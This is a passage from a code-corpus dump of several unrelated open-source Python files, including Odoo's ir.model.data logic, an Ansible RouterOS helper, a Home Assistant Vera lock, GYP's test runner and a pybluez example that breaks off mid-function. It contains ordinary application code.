self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
#result[res.model][res.res_id] = res.id
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
# the sql constraints ensure us we have only one result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
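    # Usage sketch (hypothetical external id); the helpers below build on it:
    #   data_id, res_model, res_id = imd.xmlid_lookup(cr, uid, 'base.main_company')
    # A ValueError is raised when either the ir.model.data record or its
    # target res_id is missing.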
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
        If not found, return None unless raise_if_not_found is True,
        in which case a ValueError is raised.
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
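    # Sketch: old-API spelling of xmlid_to_res_model_res_id, e.g.
    #   model, res_id = imd.get_object_reference(cr, uid, 'base', 'main_company')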
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
        If not found, raise a ValueError (the lookup is always performed
        with raise_if_not_found=True).
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
def _update_dummy(self,cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
try:
id = self.read(cr, uid, [self._get_id(cr, uid, module, xml_id)], ['res_id'])[0]['res_id']
self.loads[(module,xml_id)] = (model,id)
except:
id = False
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
def _update(self,cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
            assert len(xml_id.split('.'))==2, _("'%s' contains too many dots. XML ids should not contain dots! Dots are used to refer to other modules' data, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
# In update mode, do not update a record if it's ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, uid, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, uid, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, uid, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, uid, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, uid, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
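    # Sketch of a typical call (hypothetical values), as issued by the XML
    # data loader: it creates the record on first install and updates it on
    # later upgrades, unless its ir.model.data entry is flagged noupdate.
    #   imd._update(cr, uid, 'res.partner', 'my_module',
    #               {'name': 'Demo'}, xml_id='partner_demo', mode='update')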
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
if isinstance(models[0], (list, tuple)):
model,res_id = models[0]
else:
res_id=None
model = models[0]
if res_id:
where = ' and res_id=%s' % (res_id,)
else:
where = ' and (res_id is null)'
if key2:
where += ' and key2=\'%s\'' % (key2,)
else:
where += ' and (key2 is null)'
cr.execute('select * from ir_values where model=%s and key=%s and name=%s'+where,(model, key, name))
res = cr.fetchone()
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
if not res:
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
elif xml_id:
cr.execute('UPDATE ir_values set value=%s WHERE model=%s and key=%s and name=%s'+where,(value, model, key, name))
ir_values_obj.invalidate_cache(cr, uid, ['value'])
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
        ``ids``, along with their corresponding database-backed structures
        (dropping tables, columns, FKs, etc.), as long as no other
        ir.model.data entry holds a reference to them (which would indicate
        that they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
        It is meant to remove records that are no longer present in the
        updated data. Such records are recognised as the ones with an xml id
        and a module in ir_model_data, with noupdate set to false, but not
        present in self.loads.
"""
if not modules:
return True
to_unlink = []
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC""",
(tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module,name) not in self.loads:
to_unlink.append((model,res_id))
if not config.get('import_partial'):
for (model, res_id) in to_unlink:
if model in self.pool:
_logger.info('Deleting %s@%s', res_id, model)
self.pool[model].unlink(cr, uid, [res_id])
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
richardcs/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/network/routeros/routeros.py
|
35
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import json
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.connection import Connection, ConnectionError
_DEVICE_CONFIGS = {}
routeros_provider_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'timeout': dict(type='int')
}
routeros_argument_spec = {}
def get_provider_argspec():
return routeros_provider_spec
def get_connection(module):
if hasattr(module, '_routeros_connection'):
return module._routeros_connection
capabilities = get_capabilities(module)
network_api = capabilities.get('network_api')
if network_api == 'cliconf':
module._routeros_connection = Connection(module._socket_path)
else:
module.fail_json(msg='Invalid connection type %s' % network_api)
return module._routeros_connection
def get_capabilities(module):
if hasattr(module, '_routeros_capabilities'):
return module._routeros_capabilities
capabilities = Connection(module._socket_path).get_capabilities()
module._routeros_capabilities = json.loads(capabilities)
return module._routeros_capabilities
def get_defaults_flag(module):
connection = get_connection(module)
try:
out = connection.get('/system default-configuration print')
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
out = to_text(out, errors='surrogate_then_replace')
commands = set()
for line in out.splitlines():
if line.strip():
commands.add(line.strip().split()[0])
if 'all' in commands:
return ['all']
else:
return ['full']
def get_config(module, flags=None):
flag_str = ' '.join(to_list(flags))
try:
return _DEVICE_CONFIGS[flag_str]
except KeyError:
connection = get_connection(module)
try:
out = connection.get_config(flags=flags)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
cfg = to_text(out, errors='surrogate_then_replace').strip()
_DEVICE_CONFIGS[flag_str] = cfg
return cfg
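# Note: results are memoized per flag string in _DEVICE_CONFIGS, so repeated
# calls with the same flags are served from the cache. Sketch (hypothetical
# flags value):
#   cfg = get_config(module, flags=['verbose'])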
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
connection = get_connection(module)
for cmd in to_list(commands):
if isinstance(cmd, dict):
command = cmd['command']
prompt = cmd['prompt']
answer = cmd['answer']
else:
command = cmd
prompt = None
answer = None
try:
out = connection.get(command, prompt, answer)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
try:
out = to_text(out, errors='surrogate_or_strict')
except UnicodeError:
module.fail_json(
msg=u'Failed to decode output from %s: %s' % (cmd, to_text(out)))
responses.append(out)
return responses
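# Minimal usage sketch inside a module (hypothetical command):
#   responses = run_commands(module, ['/system resource print'])
# Each entry may also be a dict with 'command', 'prompt' and 'answer' keys,
# matching the spec that to_commands() normalizes via ComplexList.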
def load_config(module, commands):
connection = get_connection(module)
out = connection.edit_config(commands)
|
dmeulen/home-assistant
|
refs/heads/dev
|
homeassistant/components/lock/vera.py
|
18
|
"""
Support for Vera locks.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/lock.vera/
"""
import logging
from homeassistant.components.lock import LockDevice
from homeassistant.const import (STATE_LOCKED, STATE_UNLOCKED)
from homeassistant.components.vera import (
VeraDevice, VERA_DEVICES, VERA_CONTROLLER)
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['vera']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Find and return Vera locks."""
add_devices(
VeraLock(device, VERA_CONTROLLER) for
device in VERA_DEVICES['lock'])
class VeraLock(VeraDevice, LockDevice):
"""Representation of a Vera lock."""
def __init__(self, vera_device, controller):
"""Initialize the Vera device."""
self._state = None
VeraDevice.__init__(self, vera_device, controller)
def lock(self, **kwargs):
"""Lock the device."""
self.vera_device.lock()
self._state = STATE_LOCKED
self.update_ha_state()
def unlock(self, **kwargs):
"""Unlock the device."""
self.vera_device.unlock()
self._state = STATE_UNLOCKED
self.update_ha_state()
@property
def is_locked(self):
"""Return true if device is on."""
return self._state == STATE_LOCKED
def update(self):
"""Called by the Vera device callback to update state."""
self._state = (STATE_LOCKED if self.vera_device.is_locked(True)
else STATE_UNLOCKED)
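# Note: lock()/unlock() set self._state optimistically; update() then
# reconciles it with the hub, where the True argument to is_locked()
# presumably asks pyvera for a refreshed value rather than a cached one.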
|
areski/django
|
refs/heads/master
|
tests/migrations/test_migrations_squashed_complex/3_squashed_5.py
|
770
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
replaces = [
("migrations", "3_auto"),
("migrations", "4_auto"),
("migrations", "5_auto"),
]
dependencies = [("migrations", "2_auto")]
operations = [
migrations.RunPython(migrations.RunPython.noop)
]
|
vane/django_tornado
|
refs/heads/master
|
push/context_processors.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'michal@vane.pl'
import constraint
def const(request):
return {
'SITE_PROTOCOL': constraint.PROTOCOL,
'SITE_HOST': constraint.HOST,
'SITE_PORT': constraint.PORT,
}
|
davie668/myQuiz
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/gyptest.py
|
1752
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__doc__ = """
gyptest.py -- test runner for GYP tests.
"""
import os
import optparse
import shlex
import subprocess
import sys
class CommandRunner(object):
"""
Executor class for commands, including "commands" implemented by
Python functions.
"""
verbose = True
active = True
def __init__(self, dictionary={}):
self.subst_dictionary(dictionary)
def subst_dictionary(self, dictionary):
self._subst_dictionary = dictionary
def subst(self, string, dictionary=None):
"""
Substitutes (via the format operator) the values in the specified
dictionary into the specified command.
The command can be an (action, string) tuple. In all cases, we
perform substitution on strings and don't worry if something isn't
a string. (It's probably a Python function to be executed.)
"""
if dictionary is None:
dictionary = self._subst_dictionary
if dictionary:
try:
string = string % dictionary
except TypeError:
pass
return string
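  # Sketch of the substitution (hypothetical dictionary):
  #   CommandRunner({'exe': 'python'}).subst('%(exe)s --version')
  #   -> 'python --version'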
def display(self, command, stdout=None, stderr=None):
if not self.verbose:
return
if type(command) == type(()):
func = command[0]
args = command[1:]
s = '%s(%s)' % (func.__name__, ', '.join(map(repr, args)))
if type(command) == type([]):
# TODO: quote arguments containing spaces
# TODO: handle meta characters?
s = ' '.join(command)
else:
s = self.subst(command)
if not s.endswith('\n'):
s += '\n'
sys.stdout.write(s)
sys.stdout.flush()
def execute(self, command, stdout=None, stderr=None):
"""
Executes a single command.
"""
if not self.active:
return 0
if type(command) == type(''):
command = self.subst(command)
cmdargs = shlex.split(command)
if cmdargs[0] == 'cd':
command = (os.chdir,) + tuple(cmdargs[1:])
if type(command) == type(()):
func = command[0]
args = command[1:]
return func(*args)
else:
if stdout is sys.stdout:
# Same as passing sys.stdout, except python2.4 doesn't fail on it.
subout = None
else:
# Open pipe for anything else so Popen works on python2.4.
subout = subprocess.PIPE
if stderr is sys.stderr:
# Same as passing sys.stderr, except python2.4 doesn't fail on it.
suberr = None
elif stderr is None:
# Merge with stdout if stderr isn't specified.
suberr = subprocess.STDOUT
else:
# Open pipe for anything else so Popen works on python2.4.
suberr = subprocess.PIPE
p = subprocess.Popen(command,
shell=(sys.platform == 'win32'),
stdout=subout,
stderr=suberr)
p.wait()
if stdout is None:
self.stdout = p.stdout.read()
elif stdout is not sys.stdout:
stdout.write(p.stdout.read())
if stderr not in (None, sys.stderr):
stderr.write(p.stderr.read())
return p.returncode
def run(self, command, display=None, stdout=None, stderr=None):
"""
Runs a single command, displaying it first.
"""
if display is None:
display = command
self.display(display)
return self.execute(command, stdout, stderr)
class Unbuffered(object):
def __init__(self, fp):
self.fp = fp
def write(self, arg):
self.fp.write(arg)
self.fp.flush()
def __getattr__(self, attr):
return getattr(self.fp, attr)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
def is_test_name(f):
return f.startswith('gyptest') and f.endswith('.py')
def find_all_gyptest_files(directory):
result = []
for root, dirs, files in os.walk(directory):
if '.svn' in dirs:
dirs.remove('.svn')
result.extend([ os.path.join(root, f) for f in files if is_test_name(f) ])
result.sort()
return result
def main(argv=None):
if argv is None:
argv = sys.argv
usage = "gyptest.py [-ahlnq] [-f formats] [test ...]"
parser = optparse.OptionParser(usage=usage)
parser.add_option("-a", "--all", action="store_true",
help="run all tests")
parser.add_option("-C", "--chdir", action="store", default=None,
help="chdir to the specified directory")
parser.add_option("-f", "--format", action="store", default='',
help="run tests with the specified formats")
parser.add_option("-G", '--gyp_option', action="append", default=[],
help="Add -G options to the gyp command line")
parser.add_option("-l", "--list", action="store_true",
help="list available tests and exit")
parser.add_option("-n", "--no-exec", action="store_true",
help="no execute, just print the command line")
parser.add_option("--passed", action="store_true",
help="report passed tests")
parser.add_option("--path", action="append", default=[],
help="additional $PATH directory")
parser.add_option("-q", "--quiet", action="store_true",
help="quiet, don't print test command lines")
opts, args = parser.parse_args(argv[1:])
if opts.chdir:
os.chdir(opts.chdir)
if opts.path:
extra_path = [os.path.abspath(p) for p in opts.path]
extra_path = os.pathsep.join(extra_path)
os.environ['PATH'] = extra_path + os.pathsep + os.environ['PATH']
if not args:
if not opts.all:
sys.stderr.write('Specify -a to get all tests.\n')
return 1
args = ['test']
tests = []
for arg in args:
if os.path.isdir(arg):
tests.extend(find_all_gyptest_files(os.path.normpath(arg)))
else:
if not is_test_name(os.path.basename(arg)):
print >>sys.stderr, arg, 'is not a valid gyp test name.'
sys.exit(1)
tests.append(arg)
if opts.list:
for test in tests:
print test
sys.exit(0)
CommandRunner.verbose = not opts.quiet
CommandRunner.active = not opts.no_exec
cr = CommandRunner()
os.environ['PYTHONPATH'] = os.path.abspath('test/lib')
if not opts.quiet:
sys.stdout.write('PYTHONPATH=%s\n' % os.environ['PYTHONPATH'])
passed = []
failed = []
no_result = []
if opts.format:
format_list = opts.format.split(',')
else:
# TODO: not duplicate this mapping from pylib/gyp/__init__.py
format_list = {
'aix5': ['make'],
'freebsd7': ['make'],
'freebsd8': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
'linux2': ['make', 'ninja'],
'linux3': ['make', 'ninja'],
'darwin': ['make', 'ninja', 'xcode', 'xcode-ninja'],
}[sys.platform]
for format in format_list:
os.environ['TESTGYP_FORMAT'] = format
if not opts.quiet:
sys.stdout.write('TESTGYP_FORMAT=%s\n' % format)
gyp_options = []
for option in opts.gyp_option:
gyp_options += ['-G', option]
if gyp_options and not opts.quiet:
sys.stdout.write('Extra Gyp options: %s\n' % gyp_options)
for test in tests:
status = cr.run([sys.executable, test] + gyp_options,
stdout=sys.stdout,
stderr=sys.stderr)
if status == 2:
no_result.append(test)
elif status:
failed.append(test)
else:
passed.append(test)
if not opts.quiet:
def report(description, tests):
if tests:
if len(tests) == 1:
sys.stdout.write("\n%s the following test:\n" % description)
else:
fmt = "\n%s the following %d tests:\n"
sys.stdout.write(fmt % (description, len(tests)))
sys.stdout.write("\t" + "\n\t".join(tests) + "\n")
if opts.passed:
report("Passed", passed)
report("Failed", failed)
report("No result from", no_result)
if failed:
return 1
else:
return 0
if __name__ == "__main__":
sys.exit(main())
|
reelai/packstack
|
refs/heads/master
|
packstack/installer/utils/__init__.py
|
6
|
# -*- coding: utf-8 -*-
from .datastructures import SortedDict
from .decorators import retry
from .network import get_localhost_ip, host2ip, force_ip, device_from_ip
from .shell import ScriptRunner, execute
from .shortcuts import (host_iter, hosts, get_current_user,
get_current_username, split_hosts)
from .strings import (COLORS, color_text, mask_string, state_format,
state_message)
__all__ = ('SortedDict',
'retry',
'get_localhost_ip', 'host2ip', 'force_ip', 'device_from_ip',
'ScriptRunner', 'execute',
'host_iter', 'hosts', 'get_current_user', 'get_current_username',
'split_hosts', 'COLORS', 'color_text', 'mask_string',
'state_format', 'state_message')
|
RockySteveJobs/python-for-android
|
refs/heads/master
|
python-modules/pybluez/examples/advanced/inquiry-with-rssi.py
|
47
|
# performs a simple device inquiry, followed by a remote name request of each
# discovered device
import os
import sys
import struct
import bluetooth._bluetooth as bluez
def printpacket(pkt):
for c in pkt:
sys.stdout.write("%02x " % struct.unpack("B",c)[0])
print
def read_inquiry_mode(sock):
"""returns the current mode, or -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# read_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
